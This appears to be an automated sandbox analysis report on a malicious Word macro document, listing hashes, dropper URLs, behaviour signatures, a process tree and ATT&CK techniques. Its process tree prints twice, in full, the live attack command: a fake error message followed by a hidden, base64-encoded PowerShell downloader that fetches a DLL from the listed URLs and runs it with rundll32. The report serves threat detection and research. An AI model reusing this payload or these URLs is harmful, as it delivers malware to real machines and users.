Analysis

  • max time kernel
    134s
  • max time network
    131s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 08:37

General

  • Target

    2020-29-12-76862.doc

  • Size

    157KB

  • MD5

    ac83017cd1c54fbe30b8c3a9ae6afb43

  • SHA1

    8c83cfe2ae34701a1fcfbcaf7cb4b05a346d7587

  • SHA256

    d3223160125e699dcc3187c07eac467b90e23023885f0b5434e4dccb1c176600

  • SHA512

    fbd0dd49a940f9e6db7e730fd59c698b536fe49b4bea732055243aee6d7523dd4b678c0933c6e7830237f1cb8f1854a0c01c320671b6938fc94c94ac9a2f4a7f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://thespaceastronauts.com/wp-content/j/

exe.dropper

http://sanghuangvip.com/wp-admin/7ezn/

exe.dropper

https://www.scooterinsurance.co.uk/wp-includes/m/

exe.dropper

http://nasabatam.bbtbatam.com/wp-admin/QwZXR/

exe.dropper

http://4k-iptv.eu/joinery-companies-hz4lm/T6wpd/

exe.dropper

https://technicalashish.in/wp-admin/M/

exe.dropper

https://ilmeteo.dev.keyformat.it/tpl/GB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020-29-12-76862.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3920
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAkAGQASgBXACAAPQAgACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANQB9AHsAMwB9AHsAMgB9AHsAMQB9AHsANAB9ACIALQBmACcAUwBZAFMAVABlAG0ALgAnACwAJwBUACcALAAnAGMAJwAsACcAZQAnACwAJwBvAFIAeQAnACwAJwBJAE8ALgBEAGkAcgAnACkAIAAgADsAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAcgBJAGEAQgBsAGUAOgB4AGUAVwAgACAAKAAgACAAWwB0AHkAUABFAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcATgBhAEcARQBSACcALAAnAHMAWQBTAFQARQBNAC4AbgBlAFQAJwAsACcARQBwAE8ASQBuAFQATQAnACwAJwBBACcALAAnAC4AUwBFAFIAdgBpAEMAJwApACAAKQAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAJwApACsAJwBlAG4AJwArACgAJwB0AGwAeQAnACsAJwBDAG8AbgB0ACcAKQArACcAaQAnACsAKAAnAG4AJwArACcAdQBlACcAKQApADsAJABNAGkAOAA1AHYAZwA5AD0AJABVADEAMwBUACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABNADkAMwBUADsAJABTADIAMwBSAD0AKAAnAEsAJwArACgAJwA0ACcAKwAnADEARQAnACkAKQA7ACAAIAAoACAAbABTACAAVgBhAFIASQBhAGIAbABFADoARABqAHcAIAAgACkALgBWAEEATABVAEUAOgA6ACIAQwBSAGAAZQBBAFQAYABFAEQASQByAGAARQBDAHQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAG8ASgBDACcAKwAnAEoAcQAnACsAJwBwAGMAJwApACsAKAAnAG0AYgBwACcAKwAnAG8ASgBDACcAKwAnAEoAJwApACsAKAAnAGMAMgB2ACcAKwAnAG0AaABwACcAKQArACgAJwBvACcAKwAnAEoAQwAnACkAKQAuACIAcgBgAGUAUABsAGEAQwBFACIAKAAoAFsAYwBoAEEAUgBdADEAMQAxACsAWwBjAGgAQQBSAF0ANwA0ACsAWwBjAGgAQQBSAF0ANgA3ACkALAAnAFwAJwApACkAKQA7ACQAQwAxADgAVAA9ACgAKAAnAEoAXwAnACsAJwAyACcAKQArACcAUwAnACkAOwAgACgAIABJAHQARQBtACAAIABWAEEAUgBJAGEAQgBMAGUAOgB4AGUAVwAgACkALgB2AEEAbAB1AGUAOgA6ACIAcwBlAGMAVQBgAFIAaQBgAFQAWQBgAHAAcgBPAFQATwBDAE8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQARAA0ADkASAA9ACgAJwBPACcAKwAoACcAMAAnACsAJwAzAE8AJwApACkAOwAkAFQAZAB5AG0AaAByAHcAIAA9ACAAKAAnAFMAJwArACgAJwAyADQAJwArACcAUgAnACkAKQA7ACQASQAxADgATQA9ACgAJwBGACcAKwAoACcANAAxACcAKwAnAFAAJwApACkAOwAkAE8AbAB1AHQAawBzAGYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBKAHEAcABjAG0AYgBwAHsAMAAnACsAJwB9AEoAYwAyAHYAbQBoAHAAJwArACcAewAnACsAJwAwAH0AJwApACAALQBmACAAIABbAEMAaABhAFIAXQA5ADIAKQArACQAVABkAHkAbQBoAHIAdwArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFMANQA2AEMAPQAoACcATQA3ACcAKwAnADYAVAAnACkAOwAkAEQAMABiAGEANgB4ADQAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAcwA6AC8ALwB0AGgAJwArACcAZQAnACsAJwBzACcAKQArACcAcABhACcAKwAnAGMAJwArACgAJwBlACcAKwAnAGEAcwB0AHIAbwBuAGEAdQB0AHMAJwArACcALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtACcAKwAnAC8AdwAnACsAJwBwAC0AJwArACcAYwAnACsAKAAnAG8AbgB0AGUAJwArACcAbgB0AC8AJwApACsAKAAnAGoALwBAAF0AYgAyAFsAJwArACcAcwAnACsAJwA6AC8ALwBzACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBoAHUAJwApACsAKAAnAGEAJwArACcAbgBnAHYAJwApACsAKAAnAGkAcAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwAC0AYQBkAG0AJwArACcAaQBuAC8AJwApACsAKAAnADcAZQB6AG4AJwArACcALwBAACcAKQArACgAJwBdAGIAMgBbACcAKwAnAHMAcwA6AC8AJwArACcALwB3AHcAdwAuACcAKwAnAHMAYwAnACkAKwAnAG8AbwAnACsAKAAnAHQAJwArACcAZQByACcAKQArACgAJwBpAG4AcwB1ACcAKwAnAHIAJwApACsAJwBhACcAKwAnAG4AYwAnACsAJwBlACcAKwAoACcALgBjAG8ALgAnACsAJwB1ACcAKQArACcAawAvACcAKwAoACcAdwBwAC0AJwArACcAaQAnACsAJwBuAGMAbAB1AGQAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwAvAG0ALwAnACsAJwBAAF0AJwArACcAYgAyACcAKwAnAFsAcwA6AC8ALwAnACkAKwAoACcAbgAnACsAJwBhAHMAYQAnACkAKwAnAGIAJwArACgAJwBhAHQAJwArACcAYQBtAC4AJwApACsAJwBiACcAKwAoACcAYgB0AGIAJwArACcAYQAnACkAKwAoACcAdABhACcAKwAnAG0ALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKQArACgAJwBwAC0AJwArACcAYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvACcAKwAnAFEAJwArACcAdwBaAFgAJwApACsAJwBSAC8AJwArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAcwA6ACcAKwAnAC8ALwAnACsAJwA0AGsAJwArACcALQAnACsAJwBpAHAAdAB2AC4AZQB1AC8AJwArACcAagAnACsAJwBvAGkAbgBlAHIAeQAnACkAKwAoACcALQBjACcAKwAnAG8AbQBwAGEAbgBpAGUAcwAtAGgAJwArACcAegA0AGwAJwArACcAbQAnACsAJwAvAFQAJwArACcANgB3AHAAZAAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyACcAKQArACgAJwBbAHMAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAdABlAGMAJwApACsAJwBoACcAKwAoACcAbgBpACcAKwAnAGMAJwApACsAKAAnAGEAbABhACcAKwAnAHMAaABpACcAKQArACgAJwBzAGgALgAnACsAJwBpAG4ALwAnACsAJwB3AHAALQAnACsAJwBhAGQAbQBpAG4ALwBNAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAJwArACcAWwBzAHMAOgAvACcAKQArACgAJwAvACcAKwAnAGkAbABtAGUAJwArACcAdABlAG8AJwArACcALgBkAGUAdgAnACkAKwAoACcALgAnACsAJwBrAGUAJwApACsAKAAnAHkAZgBvACcAKwAnAHIAbQBhACcAKwAnAHQAJwApACsAKAAnAC4AaQAnACsAJwB0ACcAKQArACcALwB0ACcAKwAoACcAcABsACcAKwAnAC8ARwAnACkAKwAnAEIALwAnACkALgAiAHIARQBQAGwAYQBgAGMARQAiACgAKAAnAF0AJwArACgAJwBiADIAJwArACcAWwBzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQASwA0AF8AUQAgACsAIAAkAE0AaQA4ADUAdgBnADkAIAArACAAJABNADIANgBIACkAOwAkAFgAOQAxAEsAPQAoACcASAAnACsAKAAnADQAJwArACcAOABKACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAG0AZgBoAG0AZAByACAAaQBuACAAJABEADAAYgBhADYAeAA0ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAJwArACcAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABTAFkAcwB0AGUATQAuAE4AZQBUAC4AVwBFAGIAQwBsAGkAZQBuAFQAKQAuACIARABgAG8AdwBgAE4AYABsAG8AQQBkAGYAaQBsAGUAIgAoACQAUwBtAGYAaABtAGQAcgAsACAAJABPAGwAdQB0AGsAcwBmACkAOwAkAFYANAAzAFQAPQAoACcARQA1ACcAKwAnADIAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQATwBsAHUAdABrAHMAZgApAC4AIgBMAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADMAOAAxADQANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABPAGwAdQB0AGsAcwBmACwAKAAoACcAQwBvACcAKwAnAG4AdAByAG8AJwArACcAbAAnACkAKwAnAF8AJwArACcAUgB1ACcAKwAoACcAbgAnACsAJwBEAEwATAAnACkAKQAuACIAVABPAFMAYABUAFIAaQBOAGcAIgAoACkAOwAkAFIANwAyAFgAPQAoACcARQAxACcAKwAnADUAVwAnACkAOwBiAHIAZQBhAGsAOwAkAFcAOAA2AFEAPQAoACcASgAnACsAKAAnADIAOQAnACsAJwBIACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADIAXwBUAD0AKAAnAEIAMgAnACsAJwA1AFcAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3444
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:204
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IAAkAGQASgBXACAAPQAgACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANQB9AHsAMwB9AHsAMgB9AHsAMQB9AHsANAB9ACIALQBmACcAUwBZAFMAVABlAG0ALgAnACwAJwBUACcALAAnAGMAJwAsACcAZQAnACwAJwBvAFIAeQAnACwAJwBJAE8ALgBEAGkAcgAnACkAIAAgADsAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAcgBJAGEAQgBsAGUAOgB4AGUAVwAgACAAKAAgACAAWwB0AHkAUABFAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcATgBhAEcARQBSACcALAAnAHMAWQBTAFQARQBNAC4AbgBlAFQAJwAsACcARQBwAE8ASQBuAFQATQAnACwAJwBBACcALAAnAC4AUwBFAFIAdgBpAEMAJwApACAAKQAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAJwApACsAJwBlAG4AJwArACgAJwB0AGwAeQAnACsAJwBDAG8AbgB0ACcAKQArACcAaQAnACsAKAAnAG4AJwArACcAdQBlACcAKQApADsAJABNAGkAOAA1AHYAZwA5AD0AJABVADEAMwBUACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABNADkAMwBUADsAJABTADIAMwBSAD0AKAAnAEsAJwArACgAJwA0ACcAKwAnADEARQAnACkAKQA7ACAAIAAoACAAbABTACAAVgBhAFIASQBhAGIAbABFADoARABqAHcAIAAgACkALgBWAEEATABVAEUAOgA6ACIAQwBSAGAAZQBBAFQAYABFAEQASQByAGAARQBDAHQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAG8ASgBDACcAKwAnAEoAcQAnACsAJwBwAGMAJwApACsAKAAnAG0AYgBwACcAKwAnAG8ASgBDACcAKwAnAEoAJwApACsAKAAnAGMAMgB2ACcAKwAnAG0AaABwACcAKQArACgAJwBvACcAKwAnAEoAQwAnACkAKQAuACIAcgBgAGUAUABsAGEAQwBFACIAKAAoAFsAYwBoAEEAUgBdADEAMQAxACsAWwBjAGgAQQBSAF0ANwA0ACsAWwBjAGgAQQBSAF0ANgA3ACkALAAnAFwAJwApACkAKQA7ACQAQwAxADgAVAA9ACgAKAAnAEoAXwAnACsAJwAyACcAKQArACcAUwAnACkAOwAgACgAIABJAHQARQBtACAAIABWAEEAUgBJAGEAQgBMAGUAOgB4AGUAVwAgACkALgB2AEEAbAB1AGUAOgA6ACIAcwBlAGMAVQBgAFIAaQBgAFQAWQBgAHAAcgBPAFQATwBDAE8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQARAA0ADkASAA9ACgAJwBPACcAKwAoACcAMAAnACsAJwAzAE8AJwApACkAOwAkAFQAZAB5AG0AaAByAHcAIAA9ACAAKAAnAFMAJwArACgAJwAyADQAJwArACcAUgAnACkAKQA7ACQASQAxADgATQA9ACgAJwBGACcAKwAoACcANAAxACcAKwAnAFAAJwApACkAOwAkAE8AbAB1AHQAawBzAGYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBKAHEAcABjAG0AYgBwAHsAMAAnACsAJwB9AEoAYwAyAHYAbQBoAHAAJwArACcAewAnACsAJwAwAH0AJwApACAALQBmACAAIABbAEMAaABhAFIAXQA5ADIAKQArACQAVABkAHkAbQBoAHIAdwArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFMANQA2AEMAPQAoACcATQA3ACcAKwAnADYAVAAnACkAOwAkAEQAMABiAGEANgB4ADQAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAcwA6AC8ALwB0AGgAJwArACcAZQAnACsAJwBzACcAKQArACcAcABhACcAKwAnAGMAJwArACgAJwBlACcAKwAnAGEAcwB0AHIAbwBuAGEAdQB0AHMAJwArACcALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtACcAKwAnAC8AdwAnACsAJwBwAC0AJwArACcAYwAnACsAKAAnAG8AbgB0AGUAJwArACcAbgB0AC8AJwApACsAKAAnAGoALwBAAF0AYgAyAFsAJwArACcAcwAnACsAJwA6AC8ALwBzACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBoAHUAJwApACsAKAAnAGEAJwArACcAbgBnAHYAJwApACsAKAAnAGkAcAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwAC0AYQBkAG0AJwArACcAaQBuAC8AJwApACsAKAAnADcAZQB6AG4AJwArACcALwBAACcAKQArACgAJwBdAGIAMgBbACcAKwAnAHMAcwA6AC8AJwArACcALwB3AHcAdwAuACcAKwAnAHMAYwAnACkAKwAnAG8AbwAnACsAKAAnAHQAJwArACcAZQByACcAKQArACgAJwBpAG4AcwB1ACcAKwAnAHIAJwApACsAJwBhACcAKwAnAG4AYwAnACsAJwBlACcAKwAoACcALgBjAG8ALgAnACsAJwB1ACcAKQArACcAawAvACcAKwAoACcAdwBwAC0AJwArACcAaQAnACsAJwBuAGMAbAB1AGQAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwAvAG0ALwAnACsAJwBAAF0AJwArACcAYgAyACcAKwAnAFsAcwA6AC8ALwAnACkAKwAoACcAbgAnACsAJwBhAHMAYQAnACkAKwAnAGIAJwArACgAJwBhAHQAJwArACcAYQBtAC4AJwApACsAJwBiACcAKwAoACcAYgB0AGIAJwArACcAYQAnACkAKwAoACcAdABhACcAKwAnAG0ALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKQArACgAJwBwAC0AJwArACcAYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvACcAKwAnAFEAJwArACcAdwBaAFgAJwApACsAJwBSAC8AJwArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAcwA6ACcAKwAnAC8ALwAnACsAJwA0AGsAJwArACcALQAnACsAJwBpAHAAdAB2AC4AZQB1AC8AJwArACcAagAnACsAJwBvAGkAbgBlAHIAeQAnACkAKwAoACcALQBjACcAKwAnAG8AbQBwAGEAbgBpAGUAcwAtAGgAJwArACcAegA0AGwAJwArACcAbQAnACsAJwAvAFQAJwArACcANgB3AHAAZAAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyACcAKQArACgAJwBbAHMAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAdABlAGMAJwApACsAJwBoACcAKwAoACcAbgBpACcAKwAnAGMAJwApACsAKAAnAGEAbABhACcAKwAnAHMAaABpACcAKQArACgAJwBzAGgALgAnACsAJwBpAG4ALwAnACsAJwB3AHAALQAnACsAJwBhAGQAbQBpAG4ALwBNAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAJwArACcAWwBzAHMAOgAvACcAKQArACgAJwAvACcAKwAnAGkAbABtAGUAJwArACcAdABlAG8AJwArACcALgBkAGUAdgAnACkAKwAoACcALgAnACsAJwBrAGUAJwApACsAKAAnAHkAZgBvACcAKwAnAHIAbQBhACcAKwAnAHQAJwApACsAKAAnAC4AaQAnACsAJwB0ACcAKQArACcALwB0ACcAKwAoACcAcABsACcAKwAnAC8ARwAnACkAKwAnAEIALwAnACkALgAiAHIARQBQAGwAYQBgAGMARQAiACgAKAAnAF0AJwArACgAJwBiADIAJwArACcAWwBzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQASwA0AF8AUQAgACsAIAAkAE0AaQA4ADUAdgBnADkAIAArACAAJABNADIANgBIACkAOwAkAFgAOQAxAEsAPQAoACcASAAnACsAKAAnADQAJwArACcAOABKACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAG0AZgBoAG0AZAByACAAaQBuACAAJABEADAAYgBhADYAeAA0ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAJwArACcAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABTAFkAcwB0AGUATQAuAE4AZQBUAC4AVwBFAGIAQwBsAGkAZQBuAFQAKQAuACIARABgAG8AdwBgAE4AYABsAG8AQQBkAGYAaQBsAGUAIgAoACQAUwBtAGYAaABtAGQAcgAsACAAJABPAGwAdQB0AGsAcwBmACkAOwAkAFYANAAzAFQAPQAoACcARQA1ACcAKwAnADIAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQATwBsAHUAdABrAHMAZgApAC4AIgBMAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADMAOAAxADQANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABPAGwAdQB0AGsAcwBmACwAKAAoACcAQwBvACcAKwAnAG4AdAByAG8AJwArACcAbAAnACkAKwAnAF8AJwArACcAUgB1ACcAKwAoACcAbgAnACsAJwBEAEwATAAnACkAKQAuACIAVABPAFMAYABUAFIAaQBOAGcAIgAoACkAOwAkAFIANwAyAFgAPQAoACcARQAxACcAKwAnADUAVwAnACkAOwBiAHIAZQBhAGsAOwAkAFcAOAA2AFEAPQAoACcASgAnACsAKAAnADIAOQAnACsAJwBIACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADIAXwBUAD0AKAAnAEIAMgAnACsAJwA1AFcAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3148
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Jqpcmbp\Jc2vmhp\S24R.dll,Control_RunDLL
          3⤵
            PID:2356

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Jqpcmbp\Jc2vmhp\S24R.dll
        MD5

        c7e57dea04face643c389741e7abc96a

        SHA1

        0591b83c2230ccf570fc7278dd8a369f8f50df0f

        SHA256

        a1a62dc4897a3dd540da7aeb631068ca860039b406f514fa5b0f87bf18b4133c

        SHA512

        8fb4138ad253d6ce66e8f479bb104449a70475daee2ddc2ea8843d541c07f640a3042920b99e765aa7d151bcdbfe86506f6f2aaf7b98a3e8da515e60f7d18313

      • memory/204-3-0x0000000000000000-mapping.dmp
      • memory/2356-8-0x0000000000000000-mapping.dmp
      • memory/3148-4-0x0000000000000000-mapping.dmp
      • memory/3148-5-0x00007FF8FF8A0000-0x00007FF90028C000-memory.dmp
        Filesize

        9.9MB

      • memory/3148-6-0x0000023A2F100000-0x0000023A2F101000-memory.dmp
        Filesize

        4KB

      • memory/3148-7-0x0000023A2F1D0000-0x0000023A2F1D1000-memory.dmp
        Filesize

        4KB

      • memory/3920-2-0x0000027672150000-0x0000027672787000-memory.dmp
        Filesize

        6.2MB